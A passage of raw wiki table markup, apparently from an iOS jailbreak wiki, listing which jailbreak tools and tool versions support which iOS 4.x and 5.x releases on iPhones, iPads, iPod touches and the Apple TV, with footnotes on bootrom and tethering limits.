| rowspan=&amp;quot;7&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.2&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6rc9-0.9.10b8b&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Saffron]] ([[JailbreakMe]] 3.0)&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2-2.9.14&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 4.2.7&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.8b2-0.9.10b8b&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; colspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Saffron]] ([[JailbreakMe]] 3.0)&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.6-2.9.14&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.2.8&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.2&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; colspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6rc18-0.9.10b8b&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Saffron]] ([[JailbreakMe]] 3.0)&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.7-2.9.14&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.2.9&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.8b3-0.9.10b8b&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.2.10&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.8b7-0.9.10b8b&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;5&amp;quot; {{n/a}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; | 4.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;7&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;7&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.2&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;bundle&amp;quot; /&amp;gt;&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;newboot&amp;quot; /&amp;gt;}}&lt;br /&gt;
| {{partial|Tethered&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;bundle&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6rc9-0.9.11b4&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Saffron]] ([[JailbreakMe]] 3.0)&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.3b4-2.9.14&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Star]] ([[JailbreakMe]] 2.0)&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_i&amp;quot; name=&amp;quot;modifiedstar&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.3.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.3&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6rc9-0.9.11b4&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Saffron]] ([[JailbreakMe]] 3.0)&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.5-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.3.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.3.2&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6rc13-0.9.11b4&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Saffron]] ([[JailbreakMe]] 3.0)&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.6-2.9.14&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.3.3&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.3.3-4.3.3.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6rc16-0.9.11b4&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Saffron]] ([[JailbreakMe]] 3.0)&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.7-2.9.14&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 4.3.4&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.8b3-0.9.11b4&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredera1n]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 4.3.5&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; colspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.8b7-0.9.11b4&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{yes|class=nobrradiusplz}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredera1n]]&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;4.x_i&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;oldboot3gs&amp;quot;&amp;gt;Will only work for [[N88AP|iPhone 3GS]] running the [[Bootrom 359.3|old bootrom]].&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;oldboot&amp;quot;&amp;gt;Will only work for [[N72AP|iPod touch (2nd generation)]] running the [[Bootrom 240.4|old bootrom]].&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;modifiedstar&amp;quot;&amp;gt;Star can be modified to support 4.0.2-4.3, because Apple did not correctly patch the exploits used.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;bundle&amp;quot;&amp;gt;An unofficial firmware bundle for this version must be manually added.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;newboot&amp;quot;&amp;gt;Tethered jailbreak for any [[N88AP|iPhone 3GS]] with the [[Bootrom 359.3.2|new bootrom]]. Untethered for the [[Bootrom 359.3|old bootrom]].&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Apple TV=====&lt;br /&gt;
'''Note''': &amp;quot;Marketing Version&amp;quot; is the version that the Apple TV reports in its &amp;quot;About&amp;quot; screen.&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Marketing Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS Version&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! Device&lt;br /&gt;
|-&lt;br /&gt;
! [[K66AP|Apple TV (2nd generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.0&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.1&lt;br /&gt;
| [[greenpois0n (jailbreak)|greenpois0n]]&lt;br /&gt;
| RC6&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_atv&amp;quot; name=&amp;quot;nogui&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[limera1n]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.1&lt;br /&gt;
|-&lt;br /&gt;
| [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | ?&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.1&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_atv&amp;quot; name=&amp;quot;nogui&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.1&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.2&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| ?&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_atv&amp;quot; name=&amp;quot;bundle&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | ?&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 4.1.1&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; | 4.2.1&lt;br /&gt;
| [[greenpois0n (jailbreak)|greenpois0n]]&lt;br /&gt;
| RC6-RC6.1&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.2&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.6.7 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | ? (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.2&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 4.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| 0.7.2 (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | ? (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.2.1&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | 4.3&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| 4.3-4.3.3.1&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.6rc16&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.7.3 (Mac)&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.7.13.2017 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.5-2.7.1&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 4.2.2&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 4.3&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| 4.3-4.3.3.1&lt;br /&gt;
| {{partial|Yes&amp;lt;ref group=&amp;quot;4.x_atv&amp;quot; name=&amp;quot;bundle&amp;quot; /&amp;gt;}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.7.6.??? (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.13.2017 (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;3&amp;quot; | 4.3&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | [[Seas0nPass]]&lt;br /&gt;
| 0.7.8.??? (Mac)&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}} &lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.3.29.???? (Windows)&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[unthredeh4il]]&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;4.x_atv&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;nogui&amp;quot;&amp;gt;No package management GUI.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;bundle&amp;quot;&amp;gt;A firmware bundle for this version must be manually added.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====5.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iOS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;8&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[K48AP|iPad]]&lt;br /&gt;
! [[iPad 2]]&lt;br /&gt;
! [[iPad (3rd generation)]]&lt;br /&gt;
! [[N88AP|iPhone 3GS]]&lt;br /&gt;
! [[iPhone 4]]&lt;br /&gt;
! [[N94AP|iPhone 4S]]&lt;br /&gt;
! [[N18AP|iPod touch (3rd generation)]]&lt;br /&gt;
! [[N81AP|iPod touch (4th generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;8&amp;quot; | 5.0&lt;br /&gt;
| [[Absinthe]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.1-0.4&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| rowspan=&amp;quot;8&amp;quot; {{n/a}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[Ac1dSn0w]]&lt;br /&gt;
| Beta 1-Beta 2&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[ipwndfu]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| colspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 4.3.3&amp;lt;ref group=&amp;quot;5.x_i&amp;quot; name=&amp;quot;bundle&amp;quot; /&amp;gt;&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;5&amp;quot; {{no}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{partial|Tethered}}&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[redsn0w]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.9.9b3-0.9.11b4&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{no}}&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;2&amp;quot; {{partial|Tethered}}&lt;br /&gt;
|-&lt;br /&gt;
| [[sn0wbreeze]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.8b8&lt;br /&gt;
|-&lt;br /&gt;
